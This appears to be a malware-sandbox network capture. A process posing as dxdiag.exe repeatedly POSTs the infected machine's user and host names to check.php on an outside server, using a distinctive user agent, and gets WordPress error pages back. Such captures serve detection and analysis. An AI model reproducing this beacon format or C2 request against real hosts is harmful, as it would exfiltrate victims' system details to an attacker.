                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:44.367630959 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:44.372627974 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:46.917253017 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:44 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:46.917273998 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:46.917290926 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:47.074932098 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:47.079801083 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:49.642642021 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:47 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:49.642672062 CEST | 224 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:49.643098116 CEST | 1236 | IN
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:49.643117905 CEST | 142 | IN
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:49.790544987 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:49.795411110 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:52.405380011 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:50 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:52.405395985 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:52.405406952 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:52.561920881 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:52.566806078 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:55.095746994 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:53 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:55.095768929 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:55.095781088 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        19 | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:55.534801006 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:55.539715052 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:58.090150118 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:56 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:58.090207100 CEST | 224 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:58.090217113 CEST | 1236 | IN
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:58.090226889 CEST | 142 | IN
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:58.244674921 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:58.249624014 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:00.870961905 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:58 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:00.870994091 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:00.871006966 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        21 | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:01.029520035 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:01.034427881 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:03.631191015 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:01 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:03.631252050 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:03.631305933 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        22 | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:03.777067900 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:03.781970978 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:06.419934034 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:04 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:06.419956923 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:06.419970989 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        23 | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:06.576972961 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:06.581937075 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:09.193640947 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:07 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:09.193661928 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:09.193677902 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        24 | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:48:09.403965950 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:09.408894062 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:12.018668890 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:09 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
